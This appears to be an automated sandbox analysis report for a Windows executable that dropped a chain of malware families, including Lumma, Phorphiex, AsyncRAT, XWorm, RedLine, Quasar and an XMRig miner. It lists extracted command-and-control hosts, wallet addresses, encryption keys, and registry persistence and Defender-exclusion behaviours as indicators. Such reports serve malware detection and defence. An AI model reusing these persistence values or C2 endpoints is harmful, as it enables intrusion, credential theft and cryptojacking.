Resubmissions
24-01-2025 01:23
250124-br1z1asnhz 1024-01-2025 00:12
250124-ag75wssjak 1028-11-2024 02:19
241128-cr9sks1kht 1027-11-2024 21:08
241127-zyzyaawqgn 1027-11-2024 20:16
241127-y145caymbs 1027-11-2024 20:13
241127-yzlxdavlen 1027-11-2024 19:53
241127-yl61dsxpcs 1027-11-2024 19:38
241127-ycrjcaxkfx 1027-11-2024 19:03
241127-xqsswsslej 1027-11-2024 19:03
241127-xqf44aslcr 3Analysis
-
max time kernel
791s -
max time network
901s -
platform
windows11-21h2_x64 -
resource
win11-20241007-uk -
resource tags
arch:x64arch:x86image:win11-20241007-uklocale:uk-uaos:windows11-21h2-x64systemwindows -
submitted
27-11-2024 19:53
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win11-20241007-uk
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
lumma
https://reinforcenh.shop/api
https://stogeneratmns.shop/api
https://fragnantbui.shop/api
https://drawzhotdog.shop/api
https://vozmeatillu.shop/api
https://offensivedzvju.shop/api
https://ghostreedmnu.shop/api
https://gutterydhowi.shop/api
https://moutheventushz.shop/api
https://respectabosiz.shop/api
https://bakedstusteeb.shop/api
https://conceszustyb.shop/api
https://nightybinybz.shop/api
https://standartedby.shop/api
https://mutterissuen.shop/api
https://worddosofrm.shop/api
https://berrylinyj.cyou
Extracted
phorphiex
http://185.215.113.66/
http://91.202.233.141/
0xCa90599132C4D88907Bd8E046540284aa468a035
TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6
qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
XryzFMFVpDUvU7famUGf214EXD3xNUSmQf
rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9
AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z
LdgchXq1sKbAaAJ1EXAPSRBzLb8jnTZstT
MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q
4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK
15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC
1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK
ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp
3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc
3ESHude8zUHksQg1h6hHmzY79BS36L91Yn
DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA
t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh
stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj
bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2
bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr
bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd
GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3
bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
-
mutex
753f85d83d
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Extracted
asyncrat
0.5.8
Default
stuff-data.gl.at.ply.gg:54296
u81wDUVoFHib
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
asyncrat
0.5.7B
Default
3.70.228.168:555
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
xworm
147.185.221.22:46682
127.0.0.1:46682
memory-julia.gl.at.ply.gg:3595
-
Install_directory
%Temp%
-
install_file
svchost.exe
Extracted
vidar
11.4
119b6e2263f46f13917bbde173112248
https://t.me/asg7rd
https://steamcommunity.com/profiles/76561199794498376
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Extracted
xworm
5.0
0.tcp.eu.ngrok.io:10358
6.tcp.eu.ngrok.io:10358
4.tcp.eu.ngrok.io:10358
QvDYkhYsc5WBgCcl
-
Install_directory
%AppData%
-
install_file
XClient.exe
Extracted
redline
LiveTraffic
95.179.250.45:26212
Extracted
quasar
1.1.0.0
User
erbaevbann3.ddns.net:4444
xTSR_MUTEX_tDOmSpZY0vhNMbdmkR
-
encryption_key
Uz3u2uI4Ld2N91oq93Eb
-
install_name
systemware.exe
-
log_directory
logs
-
reconnect_delay
3000
-
startup_key
System Ware
-
subdirectory
system
Extracted
redline
185.215.113.67:21405
Extracted
quasar
1.4.0.0
Office
82.117.243.110:5173
yfsS9ida0wX8mgpdJC
-
encryption_key
KDNBgA8jiBeGX1rj1dDt
-
install_name
csrss.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
NET framework
-
subdirectory
SubDir
Signatures
-
Asyncrat family
-
Detect Vidar Stealer 4 IoCs
resource yara_rule behavioral1/memory/2356-1180-0x0000000001400000-0x0000000001700000-memory.dmp family_vidar_v7 behavioral1/memory/2356-1181-0x0000000001400000-0x0000000001700000-memory.dmp family_vidar_v7 behavioral1/memory/2356-1205-0x0000000001400000-0x0000000001700000-memory.dmp family_vidar_v7 behavioral1/memory/2356-1206-0x0000000001400000-0x0000000001700000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 8 IoCs
resource yara_rule behavioral1/files/0x0002000000025cd2-502.dat family_xworm behavioral1/memory/776-509-0x0000000000860000-0x000000000087A000-memory.dmp family_xworm behavioral1/files/0x001a00000002ad9f-3459.dat family_xworm behavioral1/memory/3360-3464-0x0000000000420000-0x000000000043A000-memory.dmp family_xworm behavioral1/files/0x001900000002adad-4397.dat family_xworm behavioral1/memory/1876-4402-0x0000000000120000-0x0000000000130000-memory.dmp family_xworm behavioral1/files/0x000b000000000695-10356.dat family_xworm behavioral1/files/0x000d00000002b85b-11261.dat family_xworm -
Detects ZharkBot payload 1 IoCs
ZharkBot is a botnet written C++.
resource yara_rule behavioral1/files/0x001b00000002ae25-10029.dat zharkcore -
Lumma family
-
Phorphiex family
-
Phorphiex payload 1 IoCs
resource yara_rule behavioral1/files/0x0004000000025be9-156.dat family_phorphiex -
description flow ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe 6 ipinfo.io Process not Found 293 ip-api.com Process not Found 447 ip-api.com Process not Found 491 ip-api.com Process not Found 7 ipinfo.io Process not Found 14 ip-api.com Process not Found 224 ip-api.com Process not Found 381 ip-api.com Process not Found 406 ip-api.com Process not Found -
Quasar family
-
Quasar payload 6 IoCs
resource yara_rule behavioral1/files/0x001900000002ae20-5134.dat family_quasar behavioral1/memory/6516-5139-0x0000000000AB0000-0x0000000000B0E000-memory.dmp family_quasar behavioral1/files/0x000200000002a50c-5230.dat family_quasar behavioral1/memory/7156-5233-0x0000000000DD0000-0x0000000000E1E000-memory.dmp family_quasar behavioral1/files/0x000400000002a51b-5991.dat family_quasar behavioral1/files/0x000d00000002b7a6-11046.dat family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
resource yara_rule behavioral1/memory/864-4612-0x0000000000400000-0x0000000000452000-memory.dmp family_redline behavioral1/files/0x000900000002a500-5165.dat family_redline behavioral1/memory/7068-5170-0x0000000000CF0000-0x0000000000D42000-memory.dmp family_redline behavioral1/files/0x001d00000002aef9-5903.dat family_redline behavioral1/files/0x001a00000002af6b-7323.dat family_redline behavioral1/files/0x001500000002b28f-8180.dat family_redline -
Redline family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 4216 created 3256 4216 Blsvr.exe 52 PID 4216 created 3256 4216 Blsvr.exe 52 PID 4216 created 3256 4216 Blsvr.exe 52 PID 4924 created 3256 4924 Blsvr.exe 52 PID 4924 created 3256 4924 Blsvr.exe 52 -
Vidar family
-
Xmrig family
-
Xworm family
-
Zharkbot family
-
Async RAT payload 3 IoCs
resource yara_rule behavioral1/files/0x000a000000025c77-164.dat family_asyncrat behavioral1/files/0x0002000000025cb7-358.dat family_asyncrat behavioral1/files/0x000d00000002b719-10164.dat family_asyncrat -
XMRig Miner payload 34 IoCs
resource yara_rule behavioral1/memory/4216-150-0x00007FF757020000-0x00007FF757598000-memory.dmp xmrig behavioral1/memory/3620-157-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-191-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-238-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-681-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-777-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-1179-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-1209-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-1210-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-1212-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-1213-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-1214-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-1226-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-1227-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-1228-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-1476-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-1749-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-2015-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-2234-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-2291-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-2330-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-2399-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-2496-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-2529-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-2598-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-2665-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-2704-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-2747-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-2815-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-2888-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-2924-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-2989-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-3022-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig behavioral1/memory/3620-3055-0x00007FF61A4A0000-0x00007FF61AC8F000-memory.dmp xmrig -
Adds policy Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Rmc-GHRUZU = "\"C:\\ProgramData\\db\\music.exe\"" DEF.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run music.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Rmc-GHRUZU = "\"C:\\ProgramData\\db\\music.exe\"" music.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run DEF.exe -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 7 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\StubPath = "\"C:\\Program Files\\Google\\Chrome\\Application\\131.0.6778.86\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level --channel=stable" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Localized Name = "Google Chrome" setup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\IsInstalled = "1" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Version = "43,0,0,0" setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\ = "Google Chrome" setup.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2024 powershell.exe 7684 powershell.exe 4872 powershell.exe 5740 powershell.exe 1528 powershell.exe 5952 powershell.exe 5932 powershell.exe 5188 powershell.exe 3020 powershell.exe 5960 powershell.exe 4544 powershell.exe 2344 powershell.exe 724 powershell.exe 8972 powershell.exe 9552 powershell.exe 9700 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts svchost.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe GoogleUpdate.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe\DisableExceptionChainValidation = "0" GoogleUpdate.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 8716 netsh.exe 10020 netsh.exe -
Uses browser remote debugging 2 TTPs 13 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 9736 chrome.exe 9320 chrome.exe 2164 msedge.exe 6172 msedge.exe 6264 msedge.exe 7244 msedge.exe 10160 chrome.exe 7764 chrome.exe 7536 chrome.exe 2924 chrome.exe 9160 msedge.exe 5332 msedge.exe 9824 chrome.exe -
Drops startup file 8 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SDASD.lnk XClient.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk XClient.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftEdgeUpdate.lnk Setup.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.exe 2020.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.exe 2020.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\anubis.lnk anubis.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SDASD.lnk XClient.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 64 IoCs
pid Process 4512 cccc2.exe 3744 2020.exe 4768 2020.exe 4216 Blsvr.exe 1164 RDX123456.exe 2236 npp.exe 1104 519810010.exe 3136 Loader.exe 432 m.exe 1444 cdb.exe 1796 sgx4824p.exe 4664 AsyncClient.exe 776 svchost.exe 584 But.pif 4868 logon.exe 4112 ConsoleApp3.exe 3960 7cl16anh.exe 3804 Cooper.pif 2804 But.pif 2356 But.pif 3312 svchost.exe 4252 anubis.exe 3732 svchost.exe 5628 svchost.exe 2884 svchost.exe 5228 svchost.exe 3472 519810010.exe 6036 svchost.exe 3704 Cooper.pif 5460 svchost.exe 3360 XClient.exe 2828 injectorOld.exe 3100 golden.exe 6012 golden.exe 4752 SDASD.exe 5712 svchost.exe 5688 Cooper.pif 5516 svchost.exe 3160 SDASD.exe 4924 Blsvr.exe 5856 svchost.exe 5412 SDASD.exe 2748 svchost.exe 4940 SDASD.exe 1876 XClient.exe 6068 svchost.exe 5348 up.exe 1140 hs.exe 4568 GOLD.exe 5252 DEF.exe 5216 music.exe 5252 InstallerPack_20.1.23770_win64.exe 6228 ChromeSetup.exe 6532 GoogleUpdate.exe 7128 GoogleUpdate.exe 7164 GoogleUpdate.exe 1524 GoogleUpdateComRegisterShell64.exe 4720 GoogleUpdateComRegisterShell64.exe 972 GoogleUpdateComRegisterShell64.exe 6220 GoogleUpdate.exe 6292 GoogleUpdate.exe 6380 GoogleUpdate.exe 6516 intro.avi.exe 6860 svchost.exe -
Loads dropped DLL 64 IoCs
pid Process 4768 2020.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 2356 But.pif 1140 hs.exe 6532 GoogleUpdate.exe 7128 GoogleUpdate.exe 7164 GoogleUpdate.exe 1524 GoogleUpdateComRegisterShell64.exe 7164 GoogleUpdate.exe 4720 GoogleUpdateComRegisterShell64.exe 7164 GoogleUpdate.exe 972 GoogleUpdateComRegisterShell64.exe 7164 GoogleUpdate.exe 6220 GoogleUpdate.exe 6292 GoogleUpdate.exe 6380 GoogleUpdate.exe 6380 GoogleUpdate.exe 6292 GoogleUpdate.exe 7128 compiled.exe 7128 compiled.exe 7128 compiled.exe 7128 compiled.exe 7128 compiled.exe 7128 compiled.exe 7128 compiled.exe 7128 compiled.exe 7128 compiled.exe 7128 compiled.exe 7128 compiled.exe 7128 compiled.exe 7128 compiled.exe 7128 compiled.exe 7128 compiled.exe 7128 compiled.exe 7128 compiled.exe 7128 compiled.exe 7128 compiled.exe 7128 compiled.exe 6528 Discord.exe 6528 Discord.exe 6528 Discord.exe 6528 Discord.exe 6528 Discord.exe 6528 Discord.exe 6528 Discord.exe 6528 Discord.exe 6528 Discord.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\SDASD = "C:\\Users\\Admin\\AppData\\Local\\Temp\\SDASD.exe" XClient.exe Set value (str) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" XClient.exe Set value (str) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\Rmc-GHRUZU = "\"C:\\ProgramData\\db\\music.exe\"" DEF.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-GHRUZU = "\"C:\\ProgramData\\db\\music.exe\"" DEF.exe Set value (str) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\Rmc-GHRUZU = "\"C:\\ProgramData\\db\\music.exe\"" music.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-GHRUZU = "\"C:\\ProgramData\\db\\music.exe\"" music.exe Set value (str) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\{DA828BECE7C02089257003}\\{DA828BECE7C02089257003}.exe" Setup.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 31 IoCs
flow ioc 14 raw.githubusercontent.com 293 6.tcp.eu.ngrok.io 296 raw.githubusercontent.com 206 raw.githubusercontent.com 447 discord.com 447 0.tcp.eu.ngrok.io 459 bitbucket.org 585 raw.githubusercontent.com 15 raw.githubusercontent.com 438 6.tcp.eu.ngrok.io 492 4.tcp.eu.ngrok.io 564 raw.githubusercontent.com 474 discord.com 268 raw.githubusercontent.com 363 6.tcp.eu.ngrok.io 374 bitbucket.org 442 raw.githubusercontent.com 433 raw.githubusercontent.com 434 raw.githubusercontent.com 447 bitbucket.org 492 2.tcp.ngrok.io 328 4.tcp.eu.ngrok.io 399 4.tcp.eu.ngrok.io 573 raw.githubusercontent.com 438 0.tcp.eu.ngrok.io 490 6.tcp.eu.ngrok.io 377 bitbucket.org 218 raw.githubusercontent.com 283 raw.githubusercontent.com 348 0.tcp.eu.ngrok.io 355 raw.githubusercontent.com -
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 447 ip-api.com 7 ipinfo.io 406 ip-api.com 224 ip-api.com 293 ip-api.com 381 ip-api.com 491 ip-api.com 6 ipinfo.io 14 ip-api.com -
Power Settings 1 TTPs 10 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 4544 cmd.exe 2044 powercfg.exe 6028 powercfg.exe 5948 powercfg.exe 3272 powercfg.exe 3064 powercfg.exe 3332 powercfg.exe 4632 cmd.exe 5468 powercfg.exe 5776 powercfg.exe -
Enumerates processes with tasklist 1 TTPs 11 IoCs
pid Process 1560 tasklist.exe 2324 tasklist.exe 1876 tasklist.exe 864 tasklist.exe 5796 tasklist.exe 6052 tasklist.exe 3188 tasklist.exe 7868 tasklist.exe 3816 tasklist.exe 2008 tasklist.exe 7664 tasklist.exe -
Suspicious use of SetThreadContext 9 IoCs
description pid Process procid_target PID 4512 set thread context of 4592 4512 cccc2.exe 80 PID 4216 set thread context of 3620 4216 Blsvr.exe 107 PID 584 set thread context of 2356 584 But.pif 161 PID 3100 set thread context of 6012 3100 golden.exe 243 PID 4568 set thread context of 864 4568 GOLD.exe 321 PID 5216 set thread context of 5932 5216 music.exe 324 PID 5252 set thread context of 5756 5252 InstallerPack_20.1.23770_win64.exe 328 PID 2272 set thread context of 6612 2272 Setup.exe 383 PID 584 set thread context of 3692 584 MK.exe 441 -
resource yara_rule behavioral1/memory/6528-5410-0x00007FFA88AD0000-0x00007FFA88F35000-memory.dmp upx behavioral1/memory/6528-5414-0x00007FFA88A50000-0x00007FFA88A7C000-memory.dmp upx behavioral1/memory/6528-5415-0x00007FFA88A30000-0x00007FFA88A49000-memory.dmp upx behavioral1/memory/6528-5419-0x00007FFA7F9F0000-0x00007FFA7FD64000-memory.dmp upx behavioral1/memory/6528-5423-0x00007FFA7CBB0000-0x00007FFA7CD1D000-memory.dmp upx behavioral1/memory/6528-5422-0x00007FFA88890000-0x00007FFA888AE000-memory.dmp upx behavioral1/memory/6528-5421-0x00007FFA8E8C0000-0x00007FFA8E8D0000-memory.dmp upx behavioral1/memory/6528-5425-0x00007FFA7CA90000-0x00007FFA7CBA8000-memory.dmp upx behavioral1/memory/6528-5427-0x00007FFA808C0000-0x00007FFA808DC000-memory.dmp upx behavioral1/memory/6528-5426-0x00007FFA88AD0000-0x00007FFA88F35000-memory.dmp upx behavioral1/memory/6528-5432-0x00007FFA7F970000-0x00007FFA7F9B5000-memory.dmp upx behavioral1/memory/6528-5437-0x00007FFA808B0000-0x00007FFA808BB000-memory.dmp upx behavioral1/memory/6528-5455-0x00007FFA7F0F0000-0x00007FFA7F0FC000-memory.dmp upx behavioral1/memory/6528-5458-0x00007FFA7C7F0000-0x00007FFA7C81B000-memory.dmp upx behavioral1/memory/6528-5457-0x00007FFA7CA90000-0x00007FFA7CBA8000-memory.dmp upx behavioral1/memory/6528-5456-0x00007FFA7C820000-0x00007FFA7CA70000-memory.dmp upx behavioral1/memory/6528-5454-0x00007FFA7CA70000-0x00007FFA7CA82000-memory.dmp upx behavioral1/memory/6528-5453-0x00007FFA7F100000-0x00007FFA7F10D000-memory.dmp upx behavioral1/memory/6528-5452-0x00007FFA7F110000-0x00007FFA7F11C000-memory.dmp upx behavioral1/memory/6528-5451-0x00007FFA7F120000-0x00007FFA7F12C000-memory.dmp upx behavioral1/memory/6528-5450-0x00007FFA7F130000-0x00007FFA7F13B000-memory.dmp upx behavioral1/memory/6528-5449-0x00007FFA7F140000-0x00007FFA7F14B000-memory.dmp upx behavioral1/memory/6528-5448-0x00007FFA7F150000-0x00007FFA7F15C000-memory.dmp upx behavioral1/memory/6528-5447-0x00007FFA7F170000-0x00007FFA7F17E000-memory.dmp upx behavioral1/memory/6528-5446-0x00007FFA7F160000-0x00007FFA7F16C000-memory.dmp upx behavioral1/memory/6528-5445-0x00007FFA7F180000-0x00007FFA7F18D000-memory.dmp upx behavioral1/memory/6528-5444-0x00007FFA7F190000-0x00007FFA7F19C000-memory.dmp upx behavioral1/memory/6528-5443-0x00007FFA888B0000-0x00007FFA888C4000-memory.dmp upx behavioral1/memory/6528-5442-0x00007FFA7F960000-0x00007FFA7F96C000-memory.dmp upx behavioral1/memory/6528-5441-0x00007FFA7F1A0000-0x00007FFA7F1AB000-memory.dmp upx behavioral1/memory/6528-5440-0x00007FFA7F1B0000-0x00007FFA7F1BC000-memory.dmp upx behavioral1/memory/6528-5439-0x00007FFA7F1C0000-0x00007FFA7F1CB000-memory.dmp upx behavioral1/memory/6528-5438-0x00007FFA7F9F0000-0x00007FFA7FD64000-memory.dmp upx behavioral1/memory/6528-5436-0x00007FFA80C90000-0x00007FFA80C9B000-memory.dmp upx behavioral1/memory/6528-5435-0x00007FFA7F2F0000-0x00007FFA7F31F000-memory.dmp upx behavioral1/memory/6528-5434-0x00007FFA888D0000-0x00007FFA88986000-memory.dmp upx behavioral1/memory/6528-5433-0x00007FFA88990000-0x00007FFA889BE000-memory.dmp upx behavioral1/memory/6528-5431-0x00007FFA88A30000-0x00007FFA88A49000-memory.dmp upx behavioral1/memory/6528-5430-0x00007FFA7F9C0000-0x00007FFA7F9E5000-memory.dmp upx behavioral1/memory/6528-5429-0x00007FFA88A20000-0x00007FFA88A2B000-memory.dmp upx behavioral1/memory/6528-5428-0x00007FFA89010000-0x00007FFA8901D000-memory.dmp upx behavioral1/memory/6528-5424-0x00007FFA80CA0000-0x00007FFA80CB5000-memory.dmp upx behavioral1/memory/6528-5420-0x00007FFA888B0000-0x00007FFA888C4000-memory.dmp upx behavioral1/memory/6528-5418-0x00007FFA888D0000-0x00007FFA88986000-memory.dmp upx behavioral1/memory/6528-5417-0x00007FFA88990000-0x00007FFA889BE000-memory.dmp upx behavioral1/memory/6528-5416-0x00007FFA92EE0000-0x00007FFA92EED000-memory.dmp upx behavioral1/memory/6528-5413-0x00007FFA88A80000-0x00007FFA88A99000-memory.dmp upx behavioral1/memory/6528-5412-0x00007FFA96370000-0x00007FFA9637F000-memory.dmp upx behavioral1/memory/6528-5411-0x00007FFA88AA0000-0x00007FFA88AC4000-memory.dmp upx behavioral1/memory/6528-5472-0x00007FFA7F970000-0x00007FFA7F9B5000-memory.dmp upx behavioral1/memory/6528-5586-0x00007FFA7C820000-0x00007FFA7CA70000-memory.dmp upx behavioral1/memory/6528-5648-0x00007FFA7C7F0000-0x00007FFA7C81B000-memory.dmp upx behavioral1/memory/6528-5826-0x00007FFA88AA0000-0x00007FFA88AC4000-memory.dmp upx behavioral1/memory/6528-5825-0x00007FFA88AD0000-0x00007FFA88F35000-memory.dmp upx behavioral1/files/0x001e00000002b2ac-11683.dat upx -
